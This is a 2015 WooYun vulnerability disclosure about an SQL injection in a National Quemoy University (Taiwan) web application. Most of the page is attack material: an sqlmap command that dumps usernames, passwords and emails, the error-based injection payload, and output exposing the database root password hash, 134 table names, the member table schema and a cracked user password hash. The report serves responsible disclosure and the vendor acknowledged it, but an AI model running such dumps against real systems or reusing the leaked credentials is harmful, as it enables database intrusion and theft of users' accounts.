当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0148805

漏洞标题:台湾金门大学某处存在SQL注射漏洞(DBA权限/root密码泄露/134个表/用户密码泄露)(臺灣地區)

相关厂商:台湾国立金门大学

漏洞作者: 路人甲

提交时间:2015-10-23 10:41

修复时间:2015-12-08 16:52

公开时间:2015-12-08 16:52

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:10

漏洞状态:已交由第三方合作机构(Hitcon台湾互联网漏洞报告平台)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-10-23: 细节已通知厂商并且等待厂商处理中
2015-10-24: 厂商已经确认,细节仅向厂商公开
2015-11-03: 细节向核心白帽子及相关领域专家公开
2015-11-13: 细节向普通白帽子公开
2015-11-23: 细节向实习白帽子公开
2015-12-08: 细节向公众公开

简要描述:

台湾金门大学某处存在SQL注射漏洞(DBA权限/root密码泄露/134个表/用户密码泄露)

详细说明:

sqlmap测试地址:http://**.**.**.**/orgstuff/index.php?code=list&ids=1&launage=gb

python sqlmap.py -u "http://**.**.**.**/orgstuff/index.php?code=list&ids=1&launage=gb" -p ids --technique=E --random-agent -D km_kmit -T km_member -C ID,member_username,member_passwd,member_email --dump

漏洞证明:

---
Parameter: ids (GET)
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: code=list&ids=1 AND (SELECT 9865 FROM(SELECT COUNT(*),CONCAT(0x7178626271,(SELECT (ELT(9865=9865,1))),0x716b7a6a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&launage=gb
---
web application technology: PHP 5.6.7
back-end DBMS: MySQL 5.0
current user:    'root@localhost'
current user is DBA:    True
database management system users [1]:
[*] 'root'@'localhost'
database management system users password hashes:
[*] root [1]:
    password hash: *063BBBCB4AFA236F83D1CDACC781DF3DDF0C4801
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: ids (GET)
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: code=list&ids=1 AND (SELECT 9865 FROM(SELECT COUNT(*),CONCAT(0x7178626271,(SELECT (ELT(9865=9865,1))),0x716b7a6a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&launage=gb
---
web application technology: PHP 5.6.7
back-end DBMS: MySQL 5.0
available databases [5]:
[*] information_schema
[*] km_kmit
[*] mysql
[*] performance_schema
[*] test
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: ids (GET)
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: code=list&ids=1 AND (SELECT 9865 FROM(SELECT COUNT(*),CONCAT(0x7178626271,(SELECT (ELT(9865=9865,1))),0x716b7a6a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&launage=gb
---
web application technology: PHP 5.6.7
back-end DBMS: MySQL 5.0
Database: km_kmit
[134 tables]
+-----------------------------------+
| km_album                          |
| km_album_category                 |
| km_article                        |
| km_article_class                  |
| km_article_custom_field           |
| km_article_custom_item            |
| km_article_custom_uniqidfieldlist |
| km_article_exchange               |
| km_article_group                  |
| km_article_type                   |
| km_attachment                     |
| km_attachment_category            |
| km_attachment_item                |
| km_attachment_order               |
| km_banner                         |
| km_banner_new                     |
| km_bexchange                      |
| km_block                          |
| km_blog                           |
| km_bookmember                     |
| km_calendar                       |
| km_calendar_content               |
| km_checkfile                      |
| km_chief_mailbox                  |
| km_chief_mailbox_log              |
| km_chief_mailbox_setemail         |
| km_conference                     |
| km_conference_content             |
| km_conference_discuss             |
| km_conference_hotel               |
| km_conference_news                |
| km_conference_photo               |
| km_conference_record              |
| km_conference_schedule            |
| km_conference_signup              |
| km_conference_traffic             |
| km_conference_travel              |
| km_conference_visit               |
| km_discuss                        |
| km_discuss_article                |
| km_download                       |
| km_ecard                          |
| km_ecard_category                 |
| km_epaper                         |
| km_epaper_channel                 |
| km_epaper_order                   |
| km_evaluate                       |
| km_evaluate_basic                 |
| km_evaluate_chief                 |
| km_evaluate_content               |
| km_evaluate_data                  |
| km_evaluate_download              |
| km_evaluate_item                  |
| km_evaluate_link                  |
| km_faq                            |
| km_faq_category                   |
| km_file                           |
| km_file_category                  |
| km_form                           |
| km_form_1                         |
| km_form_10                        |
| km_form_11                        |
| km_form_12                        |
| km_form_13                        |
| km_form_14                        |
| km_form_15                        |
| km_form_16                        |
| km_form_17                        |
| km_form_18                        |
| km_form_19                        |
| km_form_2                         |
| km_form_3                         |
| km_form_4                         |
| km_form_5                         |
| km_form_6                         |
| km_form_7                         |
| km_form_8                         |
| km_form_9                         |
| km_form_userlogin                 |
| km_formvalue                      |
| km_formvaluex                     |
| km_formx                          |
| km_frame                          |
| km_ftpuse                         |
| km_gbook                          |
| km_glossary                       |
| km_glossary_category              |
| km_hits                           |
| km_image                          |
| km_keywordcreate                  |
| km_kmit_back                      |
| km_layout                         |
| km_layout_change                  |
| km_lecture                        |
| km_lecture_category               |
| km_log                            |
| km_manager                        |
| km_manager_class                  |
| km_manager_group                  |
| km_manager_job                    |
| km_manager_mark                   |
| km_manager_online                 |
| km_member                         |
| km_member_group                   |
| km_modeblock                      |
| km_modefile                       |
| km_modelist                       |
| km_modestyle                      |
| km_modetext                       |
| km_module                         |
| km_module_category                |
| km_module_distribute              |
| km_module_frame                   |
| km_mybook                         |
| km_online                         |
| km_park                           |
| km_park_apply                     |
| km_park_centre                    |
| km_photo                          |
| km_reserve                        |
| km_reserve_member                 |
| km_rss                            |
| km_rss_unit                       |
| km_setting                        |
| km_sign_up                        |
| km_sign_up_user                   |
| km_style                          |
| km_teachermem                     |
| km_template                       |
| km_tradebook                      |
| km_webstyle                       |
| t_album                           |
| t_album_category                  |
| t_photo                           |
+-----------------------------------+
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: ids (GET)
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: code=list&ids=1 AND (SELECT 9865 FROM(SELECT COUNT(*),CONCAT(0x7178626271,(SELECT (ELT(9865=9865,1))),0x716b7a6a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&launage=gb
---
web application technology: PHP 5.6.7
back-end DBMS: MySQL 5.0
Database: km_kmit
Table: km_member
[15 columns]
+-------------------+--------------+
| Column            | Type         |
+-------------------+--------------+
| address           | varchar(255) |
| disabled          | int(11)      |
| ID                | int(11)      |
| login_ip          | varchar(15)  |
| login_time        | int(11)      |
| member_audit      | int(11)      |
| member_audit_code | varchar(255) |
| member_birthday   | date         |
| member_email      | varchar(100) |
| member_idname     | varchar(250) |
| member_passwd     | varchar(50)  |
| member_realname   | varchar(50)  |
| member_sex        | varchar(10)  |
| member_username   | varchar(50)  |
| phone             | varchar(255) |
+-------------------+--------------+
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: ids (GET)
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: code=list&ids=1 AND (SELECT 9865 FROM(SELECT COUNT(*),CONCAT(0x7178626271,(SELECT (ELT(9865=9865,1))),0x716b7a6a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&launage=gb
---
web application technology: PHP 5.6.7
back-end DBMS: MySQL 5.0
Database: km_kmit
Table: km_member
[1 entry]
+----+-----------------+-------------------------------------------+--------------+
| ID | member_username | member_passwd                             | member_email |
+----+-----------------+-------------------------------------------+--------------+
| 1  | galio           | e10adc3949ba59abbe56e057f20f883e (123456) | <blank>      |
+----+-----------------+-------------------------------------------+--------------+

修复方案:

增加过滤

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:18

确认时间:2015-10-24 16:51

厂商回复:

感謝通報

最新状态:

暂无